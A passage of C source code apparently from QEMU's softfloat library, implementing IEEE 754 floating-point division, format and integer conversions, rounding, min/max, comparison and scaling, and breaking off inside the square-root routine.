return !float32_is_zero(a.s); } static bool f64_div_post(union_float64 a, union_float64 b) { if (QEMU_HARDFLOAT_2F64_USE_FP) { return fpclassify(a.h) != FP_ZERO; } return !float64_is_zero(a.s); } float32 QEMU_FLATTEN float32_div(float32 a, float32 b, float_status *s) { return float32_gen2(a, b, s, hard_f32_div, soft_f32_div, f32_div_pre, f32_div_post, NULL, NULL); } float64 QEMU_FLATTEN float64_div(float64 a, float64 b, float_status *s) { return float64_gen2(a, b, s, hard_f64_div, soft_f64_div, f64_div_pre, f64_div_post, NULL, NULL); } /* * Float to Float conversions * * Returns the result of converting one float format to another. The * conversion is performed according to the IEC/IEEE Standard for * Binary Floating-Point Arithmetic. * * The float_to_float helper only needs to take care of raising * invalid exceptions and handling the conversion on NaNs. */ static FloatParts float_to_float(FloatParts a, const FloatFmt *dstf, float_status *s) { if (dstf->arm_althp) { switch (a.cls) { case float_class_qnan: case float_class_snan: /* There is no NaN in the destination format. Raise Invalid * and return a zero with the sign of the input NaN. */ s->float_exception_flags |= float_flag_invalid; a.cls = float_class_zero; a.frac = 0; a.exp = 0; break; case float_class_inf: /* There is no Inf in the destination format. Raise Invalid * and return the maximum normal with the correct sign. */ s->float_exception_flags |= float_flag_invalid; a.cls = float_class_normal; a.exp = dstf->exp_max; a.frac = ((1ull << dstf->frac_size) - 1) << dstf->frac_shift; break; default: break; } } else if (is_nan(a.cls)) { if (is_snan(a.cls)) { s->float_exception_flags |= float_flag_invalid; a = parts_silence_nan(a, s); } if (s->default_nan_mode) { return parts_default_nan(s); } } return a; } float32 float16_to_float32(float16 a, bool ieee, float_status *s) { const FloatFmt *fmt16 = ieee ? &float16_params : &float16_params_ahp; FloatParts p = float16a_unpack_canonical(a, s, fmt16); FloatParts pr = float_to_float(p, &float32_params, s); return float32_round_pack_canonical(pr, s); } float64 float16_to_float64(float16 a, bool ieee, float_status *s) { const FloatFmt *fmt16 = ieee ? &float16_params : &float16_params_ahp; FloatParts p = float16a_unpack_canonical(a, s, fmt16); FloatParts pr = float_to_float(p, &float64_params, s); return float64_round_pack_canonical(pr, s); } float16 float32_to_float16(float32 a, bool ieee, float_status *s) { const FloatFmt *fmt16 = ieee ? &float16_params : &float16_params_ahp; FloatParts p = float32_unpack_canonical(a, s); FloatParts pr = float_to_float(p, fmt16, s); return float16a_round_pack_canonical(pr, s, fmt16); } static float64 QEMU_SOFTFLOAT_ATTR soft_float32_to_float64(float32 a, float_status *s) { FloatParts p = float32_unpack_canonical(a, s); FloatParts pr = float_to_float(p, &float64_params, s); return float64_round_pack_canonical(pr, s); } float64 float32_to_float64(float32 a, float_status *s) { if (likely(float32_is_normal(a))) { /* Widening conversion can never produce inexact results. */ union_float32 uf; union_float64 ud; uf.s = a; ud.h = uf.h; return ud.s; } else if (float32_is_zero(a)) { return float64_set_sign(float64_zero, float32_is_neg(a)); } else { return soft_float32_to_float64(a, s); } } float16 float64_to_float16(float64 a, bool ieee, float_status *s) { const FloatFmt *fmt16 = ieee ? &float16_params : &float16_params_ahp; FloatParts p = float64_unpack_canonical(a, s); FloatParts pr = float_to_float(p, fmt16, s); return float16a_round_pack_canonical(pr, s, fmt16); } float32 float64_to_float32(float64 a, float_status *s) { FloatParts p = float64_unpack_canonical(a, s); FloatParts pr = float_to_float(p, &float32_params, s); return float32_round_pack_canonical(pr, s); } /* * Rounds the floating-point value `a' to an integer, and returns the * result as a floating-point value. The operation is performed * according to the IEC/IEEE Standard for Binary Floating-Point * Arithmetic. */ static FloatParts round_to_int(FloatParts a, int rmode, int scale, float_status *s) { switch (a.cls) { case float_class_qnan: case float_class_snan: return return_nan(a, s); case float_class_zero: case float_class_inf: /* already "integral" */ break; case float_class_normal: scale = MIN(MAX(scale, -0x10000), 0x10000); a.exp += scale; if (a.exp >= DECOMPOSED_BINARY_POINT) { /* already integral */ break; } if (a.exp < 0) { bool one = false; /* all fractional */ s->float_exception_flags |= float_flag_inexact; switch (rmode) { case float_round_nearest_even: one = a.exp == -1 && a.frac > DECOMPOSED_IMPLICIT_BIT; break; case float_round_ties_away: one = a.exp == -1 && a.frac >= DECOMPOSED_IMPLICIT_BIT; break; case float_round_to_zero: one = false; break; case float_round_up: one = !a.sign; break; case float_round_down: one = a.sign; break; case float_round_to_odd: one = true; break; default: g_assert_not_reached(); break; } if (one) { a.frac = DECOMPOSED_IMPLICIT_BIT; a.exp = 0; } else { a.cls = float_class_zero; } } else { uint64_t frac_lsb = DECOMPOSED_IMPLICIT_BIT >> a.exp; uint64_t frac_lsbm1 = frac_lsb >> 1; uint64_t rnd_even_mask = (frac_lsb - 1) | frac_lsb; uint64_t rnd_mask = rnd_even_mask >> 1; uint64_t inc = 0; switch (rmode) { case float_round_nearest_even: inc = ((a.frac & rnd_even_mask) != frac_lsbm1 ? frac_lsbm1 : 0); break; case float_round_ties_away: inc = frac_lsbm1; break; case float_round_to_zero: inc = 0; break; case float_round_up: inc = a.sign ? 0 : rnd_mask; break; case float_round_down: inc = a.sign ? rnd_mask : 0; break; case float_round_to_odd: inc = a.frac & frac_lsb ? 0 : rnd_mask; break; default: g_assert_not_reached(); break; } if (a.frac & rnd_mask) { s->float_exception_flags |= float_flag_inexact; a.frac += inc; a.frac &= ~rnd_mask; if (a.frac & DECOMPOSED_OVERFLOW_BIT) { a.frac >>= 1; a.exp++; } } } break; default: g_assert_not_reached(); } return a; } float16 float16_round_to_int(float16 a, float_status *s) { FloatParts pa = float16_unpack_canonical(a, s); FloatParts pr = round_to_int(pa, s->float_rounding_mode, 0, s); return float16_round_pack_canonical(pr, s); } float32 float32_round_to_int(float32 a, float_status *s) { FloatParts pa = float32_unpack_canonical(a, s); FloatParts pr = round_to_int(pa, s->float_rounding_mode, 0, s); return float32_round_pack_canonical(pr, s); } float64 float64_round_to_int(float64 a, float_status *s) { FloatParts pa = float64_unpack_canonical(a, s); FloatParts pr = round_to_int(pa, s->float_rounding_mode, 0, s); return float64_round_pack_canonical(pr, s); } /* * Returns the result of converting the floating-point value `a' to * the two's complement integer format. The conversion is performed * according to the IEC/IEEE Standard for Binary Floating-Point * Arithmetic---which means in particular that the conversion is * rounded according to the current rounding mode. If `a' is a NaN, * the largest positive integer is returned. Otherwise, if the * conversion overflows, the largest integer with the same sign as `a' * is returned. */ static int64_t round_to_int_and_pack(FloatParts in, int rmode, int scale, int64_t min, int64_t max, float_status *s) { uint64_t r; int orig_flags = get_float_exception_flags(s); FloatParts p = round_to_int(in, rmode, scale, s); switch (p.cls) { case float_class_snan: case float_class_qnan: s->float_exception_flags = orig_flags | float_flag_invalid; return max; case float_class_inf: s->float_exception_flags = orig_flags | float_flag_invalid; return p.sign ? min : max; case float_class_zero: return 0; case float_class_normal: if (p.exp < DECOMPOSED_BINARY_POINT) { r = p.frac >> (DECOMPOSED_BINARY_POINT - p.exp); } else if (p.exp - DECOMPOSED_BINARY_POINT < 2) { r = p.frac << (p.exp - DECOMPOSED_BINARY_POINT); } else { r = UINT64_MAX; } if (p.sign) { #ifdef _MSC_VER if (r <= 0ULL - (uint64_t)min) { return (0ULL - r); #else if (r <= -(uint64_t) min) { return -r; #endif } else { s->float_exception_flags = orig_flags | float_flag_invalid; return min; } } else { if (r <= max) { return r; } else { s->float_exception_flags = orig_flags | float_flag_invalid; return max; } } default: g_assert_not_reached(); return max; } } int16_t float16_to_int16_scalbn(float16 a, int rmode, int scale, float_status *s) { return round_to_int_and_pack(float16_unpack_canonical(a, s), rmode, scale, INT16_MIN, INT16_MAX, s); } int32_t float16_to_int32_scalbn(float16 a, int rmode, int scale, float_status *s) { return round_to_int_and_pack(float16_unpack_canonical(a, s), rmode, scale, INT32_MIN, INT32_MAX, s); } int64_t float16_to_int64_scalbn(float16 a, int rmode, int scale, float_status *s) { return round_to_int_and_pack(float16_unpack_canonical(a, s), rmode, scale, INT64_MIN, INT64_MAX, s); } int16_t float32_to_int16_scalbn(float32 a, int rmode, int scale, float_status *s) { return round_to_int_and_pack(float32_unpack_canonical(a, s), rmode, scale, INT16_MIN, INT16_MAX, s); } int32_t float32_to_int32_scalbn(float32 a, int rmode, int scale, float_status *s) { return round_to_int_and_pack(float32_unpack_canonical(a, s), rmode, scale, INT32_MIN, INT32_MAX, s); } int64_t float32_to_int64_scalbn(float32 a, int rmode, int scale, float_status *s) { return round_to_int_and_pack(float32_unpack_canonical(a, s), rmode, scale, INT64_MIN, INT64_MAX, s); } int16_t float64_to_int16_scalbn(float64 a, int rmode, int scale, float_status *s) { return round_to_int_and_pack(float64_unpack_canonical(a, s), rmode, scale, INT16_MIN, INT16_MAX, s); } int32_t float64_to_int32_scalbn(float64 a, int rmode, int scale, float_status *s) { return round_to_int_and_pack(float64_unpack_canonical(a, s), rmode, scale, INT32_MIN, INT32_MAX, s); } int64_t float64_to_int64_scalbn(float64 a, int rmode, int scale, float_status *s) { return round_to_int_and_pack(float64_unpack_canonical(a, s), rmode, scale, INT64_MIN, INT64_MAX, s); } int16_t float16_to_int16(float16 a, float_status *s) { return float16_to_int16_scalbn(a, s->float_rounding_mode, 0, s); } int32_t float16_to_int32(float16 a, float_status *s) { return float16_to_int32_scalbn(a, s->float_rounding_mode, 0, s); } int64_t float16_to_int64(float16 a, float_status *s) { return float16_to_int64_scalbn(a, s->float_rounding_mode, 0, s); } int16_t float32_to_int16(float32 a, float_status *s) { return float32_to_int16_scalbn(a, s->float_rounding_mode, 0, s); } int32_t float32_to_int32(float32 a, float_status *s) { return float32_to_int32_scalbn(a, s->float_rounding_mode, 0, s); } int64_t float32_to_int64(float32 a, float_status *s) { return float32_to_int64_scalbn(a, s->float_rounding_mode, 0, s); } int16_t float64_to_int16(float64 a, float_status *s) { return float64_to_int16_scalbn(a, s->float_rounding_mode, 0, s); } int32_t float64_to_int32(float64 a, float_status *s) { return float64_to_int32_scalbn(a, s->float_rounding_mode, 0, s); } int64_t float64_to_int64(float64 a, float_status *s) { return float64_to_int64_scalbn(a, s->float_rounding_mode, 0, s); } int16_t float16_to_int16_round_to_zero(float16 a, float_status *s) { return float16_to_int16_scalbn(a, float_round_to_zero, 0, s); } int32_t float16_to_int32_round_to_zero(float16 a, float_status *s) { return float16_to_int32_scalbn(a, float_round_to_zero, 0, s); } int64_t float16_to_int64_round_to_zero(float16 a, float_status *s) { return float16_to_int64_scalbn(a, float_round_to_zero, 0, s); } int16_t float32_to_int16_round_to_zero(float32 a, float_status *s) { return float32_to_int16_scalbn(a, float_round_to_zero, 0, s); } int32_t float32_to_int32_round_to_zero(float32 a, float_status *s) { return float32_to_int32_scalbn(a, float_round_to_zero, 0, s); } int64_t float32_to_int64_round_to_zero(float32 a, float_status *s) { return float32_to_int64_scalbn(a, float_round_to_zero, 0, s); } int16_t float64_to_int16_round_to_zero(float64 a, float_status *s) { return float64_to_int16_scalbn(a, float_round_to_zero, 0, s); } int32_t float64_to_int32_round_to_zero(float64 a, float_status *s) { return float64_to_int32_scalbn(a, float_round_to_zero, 0, s); } int64_t float64_to_int64_round_to_zero(float64 a, float_status *s) { return float64_to_int64_scalbn(a, float_round_to_zero, 0, s); } /* * Returns the result of converting the floating-point value `a' to * the unsigned integer format. The conversion is performed according * to the IEC/IEEE Standard for Binary Floating-Point * Arithmetic---which means in particular that the conversion is * rounded according to the current rounding mode. If `a' is a NaN, * the largest unsigned integer is returned. Otherwise, if the * conversion overflows, the largest unsigned integer is returned. If * the 'a' is negative, the result is rounded and zero is returned; * values that do not round to zero will raise the inexact exception * flag. */ static uint64_t round_to_uint_and_pack(FloatParts in, int rmode, int scale, uint64_t max, float_status *s) { int orig_flags = get_float_exception_flags(s); FloatParts p = round_to_int(in, rmode, scale, s); uint64_t r; switch (p.cls) { case float_class_snan: case float_class_qnan: s->float_exception_flags = orig_flags | float_flag_invalid; return max; case float_class_inf: s->float_exception_flags = orig_flags | float_flag_invalid; return p.sign ? 0 : max; case float_class_zero: return 0; case float_class_normal: if (p.sign) { s->float_exception_flags = orig_flags | float_flag_invalid; return 0; } if (p.exp < DECOMPOSED_BINARY_POINT) { r = p.frac >> (DECOMPOSED_BINARY_POINT - p.exp); } else if (p.exp - DECOMPOSED_BINARY_POINT < 2) { r = p.frac << (p.exp - DECOMPOSED_BINARY_POINT); } else { s->float_exception_flags = orig_flags | float_flag_invalid; return max; } /* For uint64 this will never trip, but if p.exp is too large * to shift a decomposed fraction we shall have exited via the * 3rd leg above. */ if (r > max) { s->float_exception_flags = orig_flags | float_flag_invalid; return max; } return r; default: g_assert_not_reached(); return max; } } uint16_t float16_to_uint16_scalbn(float16 a, int rmode, int scale, float_status *s) { return round_to_uint_and_pack(float16_unpack_canonical(a, s), rmode, scale, UINT16_MAX, s); } uint32_t float16_to_uint32_scalbn(float16 a, int rmode, int scale, float_status *s) { return round_to_uint_and_pack(float16_unpack_canonical(a, s), rmode, scale, UINT32_MAX, s); } uint64_t float16_to_uint64_scalbn(float16 a, int rmode, int scale, float_status *s) { return round_to_uint_and_pack(float16_unpack_canonical(a, s), rmode, scale, UINT64_MAX, s); } uint16_t float32_to_uint16_scalbn(float32 a, int rmode, int scale, float_status *s) { return round_to_uint_and_pack(float32_unpack_canonical(a, s), rmode, scale, UINT16_MAX, s); } uint32_t float32_to_uint32_scalbn(float32 a, int rmode, int scale, float_status *s) { return round_to_uint_and_pack(float32_unpack_canonical(a, s), rmode, scale, UINT32_MAX, s); } uint64_t float32_to_uint64_scalbn(float32 a, int rmode, int scale, float_status *s) { return round_to_uint_and_pack(float32_unpack_canonical(a, s), rmode, scale, UINT64_MAX, s); } uint16_t float64_to_uint16_scalbn(float64 a, int rmode, int scale, float_status *s) { return round_to_uint_and_pack(float64_unpack_canonical(a, s), rmode, scale, UINT16_MAX, s); } uint32_t float64_to_uint32_scalbn(float64 a, int rmode, int scale, float_status *s) { return round_to_uint_and_pack(float64_unpack_canonical(a, s), rmode, scale, UINT32_MAX, s); } uint64_t float64_to_uint64_scalbn(float64 a, int rmode, int scale, float_status *s) { return round_to_uint_and_pack(float64_unpack_canonical(a, s), rmode, scale, UINT64_MAX, s); } uint16_t float16_to_uint16(float16 a, float_status *s) { return float16_to_uint16_scalbn(a, s->float_rounding_mode, 0, s); } uint32_t float16_to_uint32(float16 a, float_status *s) { return float16_to_uint32_scalbn(a, s->float_rounding_mode, 0, s); } uint64_t float16_to_uint64(float16 a, float_status *s) { return float16_to_uint64_scalbn(a, s->float_rounding_mode, 0, s); } uint16_t float32_to_uint16(float32 a, float_status *s) { return float32_to_uint16_scalbn(a, s->float_rounding_mode, 0, s); } uint32_t float32_to_uint32(float32 a, float_status *s) { return float32_to_uint32_scalbn(a, s->float_rounding_mode, 0, s); } uint64_t float32_to_uint64(float32 a, float_status *s) { return float32_to_uint64_scalbn(a, s->float_rounding_mode, 0, s); } uint16_t float64_to_uint16(float64 a, float_status *s) { return float64_to_uint16_scalbn(a, s->float_rounding_mode, 0, s); } uint32_t float64_to_uint32(float64 a, float_status *s) { return float64_to_uint32_scalbn(a, s->float_rounding_mode, 0, s); } uint64_t float64_to_uint64(float64 a, float_status *s) { return float64_to_uint64_scalbn(a, s->float_rounding_mode, 0, s); } uint16_t float16_to_uint16_round_to_zero(float16 a, float_status *s) { return float16_to_uint16_scalbn(a, float_round_to_zero, 0, s); } uint32_t float16_to_uint32_round_to_zero(float16 a, float_status *s) { return float16_to_uint32_scalbn(a, float_round_to_zero, 0, s); } uint64_t float16_to_uint64_round_to_zero(float16 a, float_status *s) { return float16_to_uint64_scalbn(a, float_round_to_zero, 0, s); } uint16_t float32_to_uint16_round_to_zero(float32 a, float_status *s) { return float32_to_uint16_scalbn(a, float_round_to_zero, 0, s); } uint32_t float32_to_uint32_round_to_zero(float32 a, float_status *s) { return float32_to_uint32_scalbn(a, float_round_to_zero, 0, s); } uint64_t float32_to_uint64_round_to_zero(float32 a, float_status *s) { return float32_to_uint64_scalbn(a, float_round_to_zero, 0, s); } uint16_t float64_to_uint16_round_to_zero(float64 a, float_status *s) { return float64_to_uint16_scalbn(a, float_round_to_zero, 0, s); } uint32_t float64_to_uint32_round_to_zero(float64 a, float_status *s) { return float64_to_uint32_scalbn(a, float_round_to_zero, 0, s); } uint64_t float64_to_uint64_round_to_zero(float64 a, float_status *s) { return float64_to_uint64_scalbn(a, float_round_to_zero, 0, s); } /* * Integer to float conversions * * Returns the result of converting the two's complement integer `a' * to the floating-point format. The conversion is performed according * to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. */ static FloatParts int_to_float(int64_t a, int scale, float_status *status) { FloatParts r = { .sign = false }; if (a == 0) { r.cls = float_class_zero; } else { uint64_t f = a; int shift; r.cls = float_class_normal; if (a < 0) { #ifdef _MSC_VER f = 0ULL - f; #else f = -f; #endif r.sign = true; } shift = clz64(f) - 1; scale = MIN(MAX(scale, -0x10000), 0x10000); r.exp = DECOMPOSED_BINARY_POINT - shift + scale; r.frac = (shift < 0 ? DECOMPOSED_IMPLICIT_BIT : f << shift); } return r; } float16 int64_to_float16_scalbn(int64_t a, int scale, float_status *status) { FloatParts pa = int_to_float(a, scale, status); return float16_round_pack_canonical(pa, status); } float16 int32_to_float16_scalbn(int32_t a, int scale, float_status *status) { return int64_to_float16_scalbn(a, scale, status); } float16 int16_to_float16_scalbn(int16_t a, int scale, float_status *status) { return int64_to_float16_scalbn(a, scale, status); } float16 int64_to_float16(int64_t a, float_status *status) { return int64_to_float16_scalbn(a, 0, status); } float16 int32_to_float16(int32_t a, float_status *status) { return int64_to_float16_scalbn(a, 0, status); } float16 int16_to_float16(int16_t a, float_status *status) { return int64_to_float16_scalbn(a, 0, status); } float32 int64_to_float32_scalbn(int64_t a, int scale, float_status *status) { FloatParts pa = int_to_float(a, scale, status); return float32_round_pack_canonical(pa, status); } float32 int32_to_float32_scalbn(int32_t a, int scale, float_status *status) { return int64_to_float32_scalbn(a, scale, status); } float32 int16_to_float32_scalbn(int16_t a, int scale, float_status *status) { return int64_to_float32_scalbn(a, scale, status); } float32 int64_to_float32(int64_t a, float_status *status) { return int64_to_float32_scalbn(a, 0, status); } float32 int32_to_float32(int32_t a, float_status *status) { return int64_to_float32_scalbn(a, 0, status); } float32 int16_to_float32(int16_t a, float_status *status) { return int64_to_float32_scalbn(a, 0, status); } float64 int64_to_float64_scalbn(int64_t a, int scale, float_status *status) { FloatParts pa = int_to_float(a, scale, status); return float64_round_pack_canonical(pa, status); } float64 int32_to_float64_scalbn(int32_t a, int scale, float_status *status) { return int64_to_float64_scalbn(a, scale, status); } float64 int16_to_float64_scalbn(int16_t a, int scale, float_status *status) { return int64_to_float64_scalbn(a, scale, status); } float64 int64_to_float64(int64_t a, float_status *status) { return int64_to_float64_scalbn(a, 0, status); } float64 int32_to_float64(int32_t a, float_status *status) { return int64_to_float64_scalbn(a, 0, status); } float64 int16_to_float64(int16_t a, float_status *status) { return int64_to_float64_scalbn(a, 0, status); } /* * Unsigned Integer to float conversions * * Returns the result of converting the unsigned integer `a' to the * floating-point format. The conversion is performed according to the * IEC/IEEE Standard for Binary Floating-Point Arithmetic. */ static FloatParts uint_to_float(uint64_t a, int scale, float_status *status) { FloatParts r = { .sign = false }; if (a == 0) { r.cls = float_class_zero; } else { scale = MIN(MAX(scale, -0x10000), 0x10000); r.cls = float_class_normal; if ((int64_t)a < 0) { r.exp = DECOMPOSED_BINARY_POINT + 1 + scale; shift64RightJamming(a, 1, &a); r.frac = a; } else { int shift = clz64(a) - 1; r.exp = DECOMPOSED_BINARY_POINT - shift + scale; r.frac = a << shift; } } return r; } float16 uint64_to_float16_scalbn(uint64_t a, int scale, float_status *status) { FloatParts pa = uint_to_float(a, scale, status); return float16_round_pack_canonical(pa, status); } float16 uint32_to_float16_scalbn(uint32_t a, int scale, float_status *status) { return uint64_to_float16_scalbn(a, scale, status); } float16 uint16_to_float16_scalbn(uint16_t a, int scale, float_status *status) { return uint64_to_float16_scalbn(a, scale, status); } float16 uint64_to_float16(uint64_t a, float_status *status) { return uint64_to_float16_scalbn(a, 0, status); } float16 uint32_to_float16(uint32_t a, float_status *status) { return uint64_to_float16_scalbn(a, 0, status); } float16 uint16_to_float16(uint16_t a, float_status *status) { return uint64_to_float16_scalbn(a, 0, status); } float32 uint64_to_float32_scalbn(uint64_t a, int scale, float_status *status) { FloatParts pa = uint_to_float(a, scale, status); return float32_round_pack_canonical(pa, status); } float32 uint32_to_float32_scalbn(uint32_t a, int scale, float_status *status) { return uint64_to_float32_scalbn(a, scale, status); } float32 uint16_to_float32_scalbn(uint16_t a, int scale, float_status *status) { return uint64_to_float32_scalbn(a, scale, status); } float32 uint64_to_float32(uint64_t a, float_status *status) { return uint64_to_float32_scalbn(a, 0, status); } float32 uint32_to_float32(uint32_t a, float_status *status) { return uint64_to_float32_scalbn(a, 0, status); } float32 uint16_to_float32(uint16_t a, float_status *status) { return uint64_to_float32_scalbn(a, 0, status); } float64 uint64_to_float64_scalbn(uint64_t a, int scale, float_status *status) { FloatParts pa = uint_to_float(a, scale, status); return float64_round_pack_canonical(pa, status); } float64 uint32_to_float64_scalbn(uint32_t a, int scale, float_status *status) { return uint64_to_float64_scalbn(a, scale, status); } float64 uint16_to_float64_scalbn(uint16_t a, int scale, float_status *status) { return uint64_to_float64_scalbn(a, scale, status); } float64 uint64_to_float64(uint64_t a, float_status *status) { return uint64_to_float64_scalbn(a, 0, status); } float64 uint32_to_float64(uint32_t a, float_status *status) { return uint64_to_float64_scalbn(a, 0, status); } float64 uint16_to_float64(uint16_t a, float_status *status) { return uint64_to_float64_scalbn(a, 0, status); } /* Float Min/Max */ /* min() and max() functions. These can't be implemented as * 'compare and pick one input' because that would mishandle * NaNs and +0 vs -0. * * minnum() and maxnum() functions. These are similar to the min() * and max() functions but if one of the arguments is a QNaN and * the other is numerical then the numerical argument is returned. * SNaNs will get quietened before being returned. * minnum() and maxnum correspond to the IEEE 754-2008 minNum() * and maxNum() operations. min() and max() are the typical min/max * semantics provided by many CPUs which predate that specification. * * minnummag() and maxnummag() functions correspond to minNumMag() * and minNumMag() from the IEEE-754 2008. */ static FloatParts minmax_floats(FloatParts a, FloatParts b, bool ismin, bool ieee, bool ismag, float_status *s) { if (unlikely(is_nan(a.cls) || is_nan(b.cls))) { if (ieee) { /* Takes two floating-point values `a' and `b', one of * which is a NaN, and returns the appropriate NaN * result. If either `a' or `b' is a signaling NaN, * the invalid exception is raised. */ if (is_snan(a.cls) || is_snan(b.cls)) { return pick_nan(a, b, s); } else if (is_nan(a.cls) && !is_nan(b.cls)) { return b; } else if (is_nan(b.cls) && !is_nan(a.cls)) { return a; } } return pick_nan(a, b, s); } else { int a_exp = 0, b_exp = 0; switch (a.cls) { case float_class_normal: a_exp = a.exp; break; case float_class_inf: a_exp = INT_MAX; break; case float_class_zero: a_exp = INT_MIN; break; default: g_assert_not_reached(); break; } switch (b.cls) { case float_class_normal: b_exp = b.exp; break; case float_class_inf: b_exp = INT_MAX; break; case float_class_zero: b_exp = INT_MIN; break; default: g_assert_not_reached(); break; } if (ismag && (a_exp != b_exp || a.frac != b.frac)) { bool a_less = a_exp < b_exp; if (a_exp == b_exp) { a_less = a.frac < b.frac; } return a_less ^ ismin ? b : a; } if (a.sign == b.sign) { bool a_less = a_exp < b_exp; if (a_exp == b_exp) { a_less = a.frac < b.frac; } return a.sign ^ a_less ^ ismin ? b : a; } else { return a.sign ^ ismin ? b : a; } } } #define MINMAX(sz, name, ismin, isiee, ismag) \ float ## sz float ## sz ## _ ## name(float ## sz a, float ## sz b, \ float_status *s) \ { \ FloatParts pa = float ## sz ## _unpack_canonical(a, s); \ FloatParts pb = float ## sz ## _unpack_canonical(b, s); \ FloatParts pr = minmax_floats(pa, pb, ismin, isiee, ismag, s); \ \ return float ## sz ## _round_pack_canonical(pr, s); \ } MINMAX(16, min, true, false, false) MINMAX(16, minnum, true, true, false) MINMAX(16, minnummag, true, true, true) MINMAX(16, max, false, false, false) MINMAX(16, maxnum, false, true, false) MINMAX(16, maxnummag, false, true, true) MINMAX(32, min, true, false, false) MINMAX(32, minnum, true, true, false) MINMAX(32, minnummag, true, true, true) MINMAX(32, max, false, false, false) MINMAX(32, maxnum, false, true, false) MINMAX(32, maxnummag, false, true, true) MINMAX(64, min, true, false, false) MINMAX(64, minnum, true, true, false) MINMAX(64, minnummag, true, true, true) MINMAX(64, max, false, false, false) MINMAX(64, maxnum, false, true, false) MINMAX(64, maxnummag, false, true, true) #undef MINMAX /* Floating point compare */ static int compare_floats(FloatParts a, FloatParts b, bool is_quiet, float_status *s) { if (is_nan(a.cls) || is_nan(b.cls)) { if (!is_quiet || a.cls == float_class_snan || b.cls == float_class_snan) { s->float_exception_flags |= float_flag_invalid; } return float_relation_unordered; } if (a.cls == float_class_zero) { if (b.cls == float_class_zero) { return float_relation_equal; } return b.sign ? float_relation_greater : float_relation_less; } else if (b.cls == float_class_zero) { return a.sign ? float_relation_less : float_relation_greater; } /* The only really important thing about infinity is its sign. If * both are infinities the sign marks the smallest of the two. */ if (a.cls == float_class_inf) { if ((b.cls == float_class_inf) && (a.sign == b.sign)) { return float_relation_equal; } return a.sign ? float_relation_less : float_relation_greater; } else if (b.cls == float_class_inf) { return b.sign ? float_relation_greater : float_relation_less; } if (a.sign != b.sign) { return a.sign ? float_relation_less : float_relation_greater; } if (a.exp == b.exp) { if (a.frac == b.frac) { return float_relation_equal; } if (a.sign) { return a.frac > b.frac ? float_relation_less : float_relation_greater; } else { return a.frac > b.frac ? float_relation_greater : float_relation_less; } } else { if (a.sign) { return a.exp > b.exp ? float_relation_less : float_relation_greater; } else { return a.exp > b.exp ? float_relation_greater : float_relation_less; } } } #define COMPARE(name, attr, sz) \ static int attr \ name(float ## sz a, float ## sz b, bool is_quiet, float_status *s) \ { \ FloatParts pa = float ## sz ## _unpack_canonical(a, s); \ FloatParts pb = float ## sz ## _unpack_canonical(b, s); \ return compare_floats(pa, pb, is_quiet, s); \ } COMPARE(soft_f16_compare, QEMU_FLATTEN, 16) COMPARE(soft_f32_compare, QEMU_SOFTFLOAT_ATTR, 32) COMPARE(soft_f64_compare, QEMU_SOFTFLOAT_ATTR, 64) #undef COMPARE int float16_compare(float16 a, float16 b, float_status *s) { return soft_f16_compare(a, b, false, s); } int float16_compare_quiet(float16 a, float16 b, float_status *s) { return soft_f16_compare(a, b, true, s); } static int QEMU_FLATTEN f32_compare(float32 xa, float32 xb, bool is_quiet, float_status *s) { union_float32 ua, ub; ua.s = xa; ub.s = xb; if (QEMU_NO_HARDFLOAT) { goto soft; } float32_input_flush2(&ua.s, &ub.s, s); if (isgreaterequal(ua.h, ub.h)) { if (isgreater(ua.h, ub.h)) { return float_relation_greater; } return float_relation_equal; } if (likely(isless(ua.h, ub.h))) { return float_relation_less; } /* The only condition remaining is unordered. * Fall through to set flags. */ soft: return soft_f32_compare(ua.s, ub.s, is_quiet, s); } int float32_compare(float32 a, float32 b, float_status *s) { return f32_compare(a, b, false, s); } int float32_compare_quiet(float32 a, float32 b, float_status *s) { return f32_compare(a, b, true, s); } static int QEMU_FLATTEN f64_compare(float64 xa, float64 xb, bool is_quiet, float_status *s) { union_float64 ua, ub; ua.s = xa; ub.s = xb; if (QEMU_NO_HARDFLOAT) { goto soft; } float64_input_flush2(&ua.s, &ub.s, s); if (isgreaterequal(ua.h, ub.h)) { if (isgreater(ua.h, ub.h)) { return float_relation_greater; } return float_relation_equal; } if (likely(isless(ua.h, ub.h))) { return float_relation_less; } /* The only condition remaining is unordered. * Fall through to set flags. */ soft: return soft_f64_compare(ua.s, ub.s, is_quiet, s); } int float64_compare(float64 a, float64 b, float_status *s) { return f64_compare(a, b, false, s); } int float64_compare_quiet(float64 a, float64 b, float_status *s) { return f64_compare(a, b, true, s); } /* Multiply A by 2 raised to the power N. */ static FloatParts scalbn_decomposed(FloatParts a, int n, float_status *s) { if (unlikely(is_nan(a.cls))) { return return_nan(a, s); } if (a.cls == float_class_normal) { /* The largest float type (even though not supported by FloatParts) * is float128, which has a 15 bit exponent. Bounding N to 16 bits * still allows rounding to infinity, without allowing overflow * within the int32_t that backs FloatParts.exp. */ n = MIN(MAX(n, -0x10000), 0x10000); a.exp += n; } return a; } float16 float16_scalbn(float16 a, int n, float_status *status) { FloatParts pa = float16_unpack_canonical(a, status); FloatParts pr = scalbn_decomposed(pa, n, status); return float16_round_pack_canonical(pr, status); } float32 float32_scalbn(float32 a, int n, float_status *status) { FloatParts pa = float32_unpack_canonical(a, status); FloatParts pr = scalbn_decomposed(pa, n, status); return float32_round_pack_canonical(pr, status); } float64 float64_scalbn(float64 a, int n, float_status *status) { FloatParts pa = float64_unpack_canonical(a, status); FloatParts pr = scalbn_decomposed(pa, n, status); return float64_round_pack_canonical(pr, status); } /* * Square Root * * The old softfloat code did an approximation step before zeroing in * on the final result. However for simpleness we just compute the * square root by iterating down from the implicit bit to enough extra * bits to ensure we get a correctly rounded result. * * This does mean however the calculation is slower than before, * especially for 64 bit floats. */ static FloatParts sqrt_float(FloatParts a, float_status *s, const FloatFmt *p) { uint64_t a_frac, r_frac, s_frac; int bit, last_bit; if (is_nan(a.cls)) { return return_nan(a, s); } if (a.cls == float_class_zero) { return a; /* sqrt(+-0) = +-0 */ } if (a.sign) { s->float_exception_flags |= float_flag_invalid; return parts_default_nan(s); } if (a.cls == float_class_inf) { return a; /* sqrt(+inf) = +inf */ } assert(a.cls == float_class_normal); /* We need two overflow bits at the top. Adding room for that is a * right shift. If the exponent is odd, we can discard the low bit * by multiplying the fraction by 2; that's a left shift. Combine * those and we shift right if the exponent is even. */ a_frac = a.frac; if (!(a.exp & 1)) { a_frac >>= 1; } a.exp >>= 1; /* Bit-by-bit computation of sqrt. */ r_frac = 0; s_frac = 0; /* Iterate from implicit bit down to the 3 extra bits to compute a * properly rounded result. Remember we've inserted one more bit 